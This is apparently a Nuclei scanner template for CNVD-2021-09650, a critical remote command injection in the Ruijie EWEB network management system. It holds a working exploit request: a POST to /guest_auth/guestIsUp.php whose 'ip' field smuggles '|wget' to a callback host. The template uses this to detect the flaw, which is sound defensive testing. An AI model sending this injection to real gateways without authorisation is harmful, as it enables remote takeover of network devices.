id: CNVD-2021-09650

info:
  name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
  author: xc
  severity: critical
  description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: ruijie,cnvd,cnvd2021,rce

http:
  - raw:
      - |
        POST /guest_auth/guestIsUp.php
        Host: {{Hostname}}

        mac=1&ip=127.0.0.1|wget {{interactsh-url}}

    unsafe: true
    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"

# digest: 490a0046304402204dd768957b033b40dee2801a721321fdd1bda1c8e583a63d24f583d4f9cd04b402200120cdf4837581a5b65b3f7e6de8cd8aae6ed04b5d9e09649ab6ef4e5ad3aff6:922c64590222798bb761d5b6d8e72950
